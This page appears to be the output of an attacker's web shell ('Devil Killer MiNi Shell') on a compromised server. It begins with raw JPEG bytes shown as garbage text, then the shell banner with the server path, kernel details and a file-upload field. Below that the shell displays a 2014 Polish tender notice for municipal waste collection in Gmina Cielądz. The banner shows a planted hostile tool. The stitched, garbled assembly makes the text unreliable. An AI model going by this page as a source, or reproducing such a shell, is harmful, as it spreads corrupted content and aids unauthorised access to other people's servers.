JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141128/247779-N-2014.html

<p class="kh_header"><b>Cielądz: Odbiór i zagospodarowanie stałych odpadów komunalnych 
z terenu Gminy Cielądz</b><br>
<b>Numer ogłoszenia: 247779 - 2014; data zamieszczenia: 28.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Cielądzu , 96-214 Cielądz, woj. łódzkie, tel. 046 8152429, faks 046 8152352.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.cieladz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie stałych odpadów komunalnych 
z terenu Gminy Cielądz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Informacje ogólne mające wpływ na wycenę zamówienia:
Powierzchnia gminy  93,88 km2
Liczba mieszkańców zameldowanych na pobyt stały i czasowy na dzień 15-09-2014 roku wynosi 4106.
Szacunkowa liczna gospodarstw domowych wynosi 1036.

Odpady, będą odbierane ze wszystkich miejscowości Gminy Cielądz tj Brzozówka, Cielądz, Gortatowice, Grabice, Gułki, Kuczyzna, Komorów,  Łaszczyn, Mała Wieś, Mroczkowice, Niemgłowy, Nowa Mała Wieś, Nowy Komorów, Ossowice, Parolice, Sanogoszcz, Sierzchowy, Stolniki, Wisówka, Wylezinek, Zuski. 
Szacunkowa liczba pojemników 1350 sztuk.
Jako materiał pomocniczy usytuowania nieruchomości na terenie Gminy Cielądz może posłużyć system informacji przestrzennej zamieszczony na stronie internetowej Urzędu Gminy Cielądz.

W ramach zamówienia Wykonawca zobowiązany jest odbierać i zagospodarować następujące rodzaje odpadów:

1.2.1. Z zamieszkałych posesji:
a) niesegregowane (zmieszane) odpady komunalne - kod 20 03 01;
b) segregowane odpady komunalne z podziałem na frakcje:
	opakowania ze szkła;
	papier i tektura;
	tworzywa sztuczne i opakowania wielomateriałowe;
	odpady ulegające biodegradacji;
1.2.2. Z Centralnego Punktu Selektywnego Zbierania Odpadów (CPSZO) w Cielądzu pozostałe odpady komunalne:
	przeterminowane leki - kod 20 01 32;
	zużyte baterie i akumulatory - kod 20 01 34;
	zużyty sprzęt elektryczny i elektroniczny - kody 20 01 23, 20 01 35, 20 01 36;
	odpady wielkogabarytowe - kod 20 03 07;
	odpady budowlano rozbiórkowe - o kodach z grupy 17;
	zużyte opony - kod 16 01 03;
	chemikalia oraz opakowania po środkach ochrony roślin i nawozach.
1.2.3. Z następujących punktów  zużyte baterie - kod  20 01 34:
 Szkoła Podstawowa  i Publiczne Gimnazjum w Cielądzu
	 Szkoła  Podstawowa w Sierzchowach 
	Ochotnicza Straż Pożarna Cielądz 
	Ochotnicza Straż Pożarna w Sierzchowach 


1.3. Zorganizowanie Centralnego Punktu Selektywnego Zbierania Odpadów (CPSZO).

1.3.1 W ramach zamówienia w miejscu wyznaczonym przez Zamawiającego Wykonawca zorganizuje CPSZO. 
1.3.2 CPSZO zostanie wyposażony przez Wykonawcę w odpowiednie pojemniki tak aby zapewnić prawidłową segregację odpadów zgodnie z uchwałą Rady Gminy Cielądz w sprawie sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów oraz uchwałą Rady Gminy Cielądz w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Cielądz.
1.3.3 Wykonawca odpowiada za zachowanie na terenie CPSZO i wokół niego czystości i porządku.
1.3.4 CPSZO będzie przyjmował odpady od mieszkańców raz w tygodniu: w poniedziałki w godzinach 1500 - 1700 
1.3.5 Do CPSZO mieszkańcy mogą dostarczać odpady zgodnie z uchwalą Rady Gminy Cielądz w sprawie sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów oraz uchwałą Rady Gminy Cielądz w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Cielądz.

1.4. Zbiórka  odpadów wielkogabarytowych.

1.4.1. Wykonawca w ramach zamówienia zobowiązany jest do przeprowadzenia zbiórki  odpadów wielkogabarytowych bezpośrednio z nieruchomości zamieszkałych raz na pół roku  zgodnie z uchwałą Rady Gminy Cielądz w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Cielądz. 
1.4.2. Informacja o harmonogramach wywozu odpadów wielkogabarytowych będzie przekazana do publicznej wiadomości mieszkańcom w sposób zwyczajowo przyjęty oraz udostępniona na stronie internetowej Gminy Cielądz.
1.4.3. Zbiórka nie obejmuje odpadów powstałych w trakcie prowadzonej działalności przez 
podmioty gospodarcze.

1.5. Obowiązek zapewnienia pojemników

1.5.1. Na czas realizacji zamówienia Wykonawca zobowiązany będzie do zapewnienia posiadaczom nieruchomości zamieszkałych pojemników na odpady przystosowane do opróżniania mechanicznego oraz worków na odpady selektywne:
 w kolorze zielonym (na opakowania ze szkła).,
 w kolorze żółtym (na tworzywa sztuczne i opakowania wielomateriałowe),
 w kolorze niebieskim (na papier i tekturę),
 w kolorze brązowym (na odpady ulegające biodegradacji),
o pojemnościach i właściwościach określonych w uchwale Rady Gminy Cielądz w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Cielądz - załącznik Nr 10 do SIWZ. Przekazywane pojemniki powinny być odpowiednio oznakowane, nowe lub używane, czyste i estetyczne. 
1.5.2. Ilości i objętości pojemników i worków dla nieruchomości winny być dopasowane do ilości osób zamieszkałych na niej. Podstawą do obliczenia ilości pojemników i worków na odpowiednie frakcje odpadów stanowi 25 l na każdego mieszkańca jednak nie miej niż jeden pojemnik 120 l z zachowaniem warunków w pkt 1.5.1 i w Uchwale Rady Gminy Cielądz w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Cielądz. Wykaz nieruchomości i ilości osób je zamieszkujących stanowi załącznik Nr 8 do SIWZ i będzie na bieżąco aktualizowany przez Zamawiającego. 
1.5.3. Zamawiający dopuszcza udzielenie zamówień uzupełniających zgodnie z art.67 ust.1 pkt 6 ustawy PZP. Zamówienia uzupełniające stanowić mogą nie więcej niż 50% wartości zamówienia podstawowego i polegać będą na powtórzeniu zamówienia takiego samego rodzaju.
1.5.4. Pojemniki będą przez Wykonawcę dostarczane mieszkańcom na posesje w terminie 14 dni od dnia zawarcia umowy. W terminie 14 dni od zawarcia umowy Wykonawca zobowiązany jest przedłożyć Zamawiającemu raport o ilości i rodzaju pojemników znajdujących się na poszczególnych nieruchomościach wraz z informacją o posesjach problemowych, do których pojemników nie dostarczono (z podaniem przyczyny niedostarczenia).
1.5.5. Wykonawca wyposaży Centralny Punkt Selektywnego Zbierania Odpadów (CPSZO) w odpowiednie kontenery i pojemniki do gromadzenia odpadów (m.in. zużytego sprzętu elektrycznego i elektronicznego, zużytych baterii i akumulatorów, odpadów wielkogabarytowych, opon oraz odpadów ulegających biodegradacji w sposób zapewniający
prawidłową segregację odpadów), w tym co najmniej:
1 kontener KP-7 lub większy - 2 sztuki;
2 pojemnik min. 1100 litrów w kolorze żółtym (plastik) - 1 sztuka;
3 pojemnik min. 1100 litrów w kolorze niebieskim (papier) - 1 sztuka;
4 pojemnik min. 1100 litrów w kolorze zielonym (szkło) - 1 sztuka;
5 pojemnik na zużyte baterie i akumulatory - 1 sztuka.
1.5.6. Wykonawca wyposaży punkty, w których odbywać się będzie zbiórka przeterminowanych leków oraz punkty, w których odbywać się będzie zbiórka zużytych baterii i akumulatorów w odpowiednie pojemniki z uwzględnieniem potrzeb występujących w danych punktach.
1.5.7. Wykonawca odpowiada za stan porządkowy, techniczny i sanitarny pojemników do gromadzenia odpadów. Na wezwanie Zamawiającego, Wykonawca jest zobowiązany do naprawy lub wymiany uszkodzonych lub zniszczonych pojemników. 
Wykonawca ubezpieczy na własny koszt pojemniki oraz zabezpieczy je od ryzyka związanego z uszkodzeniem lub kradzieżą.
1.5.8. Jeżeli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia pojemników z winy Wykonawcy, Wykonawca zobowiązany będzie do wymiany uszkodzonego pojemnika na własny koszt.

1.6. Częstotliwość i zasady odbioru i wywozu odpadów.

1.6.1. Odbiór i wywóz odpadów komunalnych Wykonawca będzie realizował z częstotliwością i na zasadach określonych w uchwale Rady Gminy Cielądz w sprawie sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów.
1.6.2. Odbiór i wywóz odpadów komunalnych Wykonawca będzie realizował w poszczególnych miejscowościach zawsze zgodnie z harmonogramem skonsultowanym z Urzędem Gminy. 
1.6.3. Wykonawca zobowiązany jest do opracowania i dostarczenia do wszystkich nieruchomości zamieszkałych harmonogramu wywozu odpadów
3 pierwszy harmonogram, obejmujący okres od 1 stycznia 2015 r. do 31 grudnia 2015 r. Wykonawca opracuje w oparciu o szczegółowy wykaz nieruchomości (Załącznik nr 8 do SIWZ) i przedłoży Zamawiającemu do akceptacji w terminie do 5 dni roboczych od daty podpisania umowy;
4 harmonogram na okres od 1 stycznia 2016 r. do 31 grudnia 2016 r. oraz harmonogram na okres od 1 stycznia 2017 r. do 31 grudnia 2017 r. Wykonawca przekaże Zamawiającemu do akceptacji w terminie co najmniej 30 dni przed początkiem danego roku kalendarzowego;
5 Wykonawca zobowiązany jest dostarczyć do wszystkich nieruchomości harmonogram wywozu odpadów na rok 2015 do dnia 31.12.2014 r., a na rok 2016 i 2017 przy ostatnim odbiorze odpadów w roku poprzedzającym;
1.6.4. Podczas realizacji umowy niedopuszczalne jest mieszanie selektywnie zebranych odpadów komunalnych z odpadami niesegregowanymi.
1.6.5. Wykonawca zobowiązany jest do sukcesywnego wywozu odpadów z CPSZO tak aby zapewnić możliwość ciągłego dostarczania odpadów przez mieszkańców.
1.6.6. Wykonawca zobowiązany będzie monitorować stan zapełnienia pojemników na przeterminowane lekarstwa, zużyte baterie oraz akumulatory małogabarytowe i odbierać odpady w takiej częstotliwości, aby nie dopuścić do przepełnienia tych pojemników. 
1.6.7.Odbiór odpadów będzie następował z pojemników wystawionych przez właściciela nieruchomości na zewnątrz posesji, w miejscu zapewniającym swobodny dojazd specjalistycznym pojazdem.
1.6.8. W zakresie odbioru odpadów z nieruchomości o utrudnionym dojeździe (brak odpowiedniej szerokiej drogi i stabilności podłoża), Wykonawca zobowiązany jest do odbioru tych odpadów, może jednak ustalić - informując o tym fakcie właścicieli,  odrębne terminy ich wywozu.


1.7. Obowiązek kontroli segregacji odpadów przez Wykonawcę.

1.7.1. Wykonawca zobowiązany jest do monitorowania ciążącego na właścicielu nieruchomości obowiązku segregowania odpadów komunalnych, jeżeli właściciel zadeklarował selekcję odpadów, uiszczając z tego tytułu preferencyjną stawkę. 
1.7.2. W przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się z obowiązku segregacji odpadów, Wykonawca odbiera odpady jako zmieszane.  W takim przypadku Wykonawca umieszcza na pojemniku w widocznym  miejscu znacznik informujący właściciela nieruchomości o nie przestrzeganiu obowiązku segregowania odpadów. 
1.7.3. O zaistniałej sytuacji Wykonawca zawiadamia Zamawiającego drogą elektroniczną, faxem lub pisemnie, w terminie do 3 dni roboczych. Do zawiadomienia Wykonawca dołącza protokół określający: dzień wywozu, miejscowość,  numer posesji oraz krótki opis obrazujący podstawę udzielenia ostrzeżenia właścicielowi nieruchomości. Do protokołu Wykonawca zobowiązany jest dołączyć również dokumentację fotograficzną.

1.8.  Wykonawca zobowiązany będzie do prowadzenia i przekazania Zamawiającemu dokumentacji związanej z przedmiotem zamówienia:
1)Raportu na koniec I kwartału 2015 r. o ilości i rodzaju pojemników znajdujących się na 
poszczególnych nieruchomościach.
2)Raportów kwartalnych zawierających określenie ilości i rodzajów przekazywanych pojemników w danym kwartale wraz z uaktualnionym raportem o ilości i rodzaju pojemników znajdujących się na poszczególnych nieruchomościach. 
3)Sprawozdań, o których mowa w art. 9n ustawy o utrzymaniu czystości i porządku w gminach.
4)Innych informacji na temat odbioru, unieszkodliwiania i segregacji odpadów, jeżeli w trakcie realizacji zamówienia Zamawiający nałoży taki obowiązek. Obowiązek ten dotyczyć może jedynie informacji, w posiadaniu których będzie Wykonawca.
5) Załącznikiem do faktury kwartalnej będą karty przekazania odpadów uwzględniające datę, kod, rodzaj, wagę przekazanych odpadów komunalnych do RIPOK (Regionalnej Instalacji Przetwarzania Odpadów Komunalnych). Karty przekazania odpadów, o których mowa w zdaniu poprzednim muszą jednoznacznie stwierdzać, że odpady pochodzą z terenu gminy Cielądz.

1.9. Pozostałe obowiązki Wykonawcy:

1.9.1. Wykonawca podczas realizacji przedmiotu umowy zobowiązany jest do osiągnięcia odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami odbieranych odpadów komunalnych zgodnie z art. 3b i 3c ustawy o utrzymaniu czystości i porządku w gminach oraz rozporządzeniami wykonawczymi.
1.9.2. Prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami prawa obowiązującymi w tym zakresie. 
1.9.3. Przekazywanie odebranych zmieszanych odpadów komunalnych, odpadów zielonych 
oraz pozostałości z sortowania zmieszanych odpadów komunalnych przeznaczonych do składowania do właściwej Regionalnej Instalacji do Przetwarzania Odpadów Komunalnych lub, w szczególnych przypadkach, do instalacji przewidzianej do zastępczej obsługi regionu, zgodnie z uchwałą w sprawie wykonania Planu Gospodarki Odpadami dla Województwa Łódzkiego.
1.9.4. Przekazywanie selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 7 ustawy z dn. 14 grudnia 2012 r. o odpadach.
1.9.5. W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamknięcie drogi) gdy nie jest możliwa realizacja usługi zgodnie z harmonogramem, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym a Wykonawcą i może polegać w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości oraz innych terminów ich odbioru - taki sposób spełnienia świadczenia wynikającego z umowy może być wykonywany jedynie po uzyskaniu wcześniejszej akceptacji Zamawiającego.

1.10. Obowiązujące przepisy prawa:

1. Wykonawca będzie świadczył usługi odbioru odpadów zgodnie z obowiązującymi przepisami prawa:
 Ustawą z dnia z dnia 13 września 1996 r. o utrzymaniu porządku i czystości w gminach (tekst jednolity Dz. U z 2012 r. poz. 391);
 Ustawą z dnia 14 grudnia 2012r. o odpadach (Dz.U. 2013.21);
 Ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tekst jednolity Dz. U. z 2008 r. Nr 25, poz.150);
 Ustawą z dnia 29 lipca 2005 r. o zużytym sprzęcie elektrycznym i elektronicznym
(Dz. U. z 2005 r. Nr 180, poz. 1495 z późn. zm.); 
 Ustawą z dnia 24 kwietnia 2009 r. o bateriach i akumulatorach (Dz. U. z 2009 r. Nr 790, poz. 666 z późn. zm.); 
 Rozporządzeniem Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie wzoru dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. z 2010 r. Nr 249, poz. 
1673  ze zmianami),
 Rozporządzeniem Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie zakresu informacji oraz wzorów formularzy służących do sporządzania i przekazywania zbiorowych 
zestawień danych o odpadach (Dz. U. z 2010 r. , Nr 249, poz.1674 - ze zmianami),
 Rozporządzeniem Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz. U. z 2001, Nr 112, poz. 1206 - ze zmianami),
 Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. , poz. 645),
 Rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz 
realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r. , poz. 630),
 Rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów (Dz. U. z 2012 r. , poz. 676),
 Rozporządzeniem Ministra Środowiska z dn. 11.01.2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości,
 Ustawą z dnia 23 kwietnia 1964 r. Kodeks cywilny (Dz. U. Nr 16 poz. 93 ze zmianami); 
 Ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U.z 2010 r., Nr 113, poz. 759 z późn.zm.);
oraz obowiązującymi na terenie gminy aktami prawa miejscowego:
 Uchwałą Nr XXXII.152.2013 Rady Gminy Cielądz z dnia 25 kwietnia 2013r. w sprawie
uchwalenia Regulaminu utrzymania czystości i porządku na terenie Gminy Cielądz; 
 Uchwałą Nr XXX.139.2013 Rady Gminy Cielądz  z dnia 11 marca 2013 r. w sprawie 
szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów
komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian
za uiszczoną przez właścicieli nieruchomości opłatę za gospodarowanie odpadami
komunalnymi.
2. Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia.
3. Zamawiający nie dopuszcza możliwości składania ofert częściowych i wariantowych. 
4. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej. 
5. Zamawiający nie przewiduje przy wyborze oferty zastosowania aukcji elektronicznej.
6. Określenie części zamówienia, które nie mogą być powierzone podwykonawcom ze względu na specyfikę przedmiotu zamówienia.
Zamawiający nie określa części zamówienia, które nie mogą być powierzone podwykonawcom.


1.11. Wymagania stawiane Wykonawcy:

1.11.1 Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
1.11.2  Wymagana jest należyta staranność przy realizacji zobowiązań umowy. 
1.11.3 Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy.
1.11.4 Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.
1.11.5 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.12.00-4, 90.51.13.00-5, 90.51.20.00-9, 90.51.30.00-6, 90.51.31.00-7, 90.51.40.00-3, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium dla całości przedmiotu zamówienia w wysokości
22.000,00 zł (słownie: dwadzieścia dwa tysiące złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
